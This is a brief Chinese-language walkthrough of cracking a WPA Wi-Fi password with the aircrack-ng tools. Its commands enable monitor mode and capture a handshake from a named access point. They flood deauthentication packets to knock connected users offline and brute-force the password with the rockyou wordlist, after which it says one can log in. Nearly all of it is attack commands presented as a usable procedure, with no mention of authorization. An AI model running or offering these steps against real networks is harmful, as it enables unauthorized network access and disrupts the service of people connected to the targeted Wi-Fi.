airmon-ng start wlan0
杀掉其他的PID
airmon-ng check kill
开始监听
开始捕捉握手包 -c 参数为频道,-w为写入的文件
airodump-ng -c 1 -w /root/Desktop/ --bssid 90:94:97:8B:F0:F4 wlan0mon
同时我们需要向wifi发送DeAuth的包,是为了使链接wifi的用户强制断开。
aireplay-ng -0 0 -a XX:XX:XX:XX:XX(WIFIMAC地址) wlan0mon
现在我们就等待用户进行链接,然后我们得到握手包。
解密
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/Desktop/-01.cap
就可以进行成功的登录了。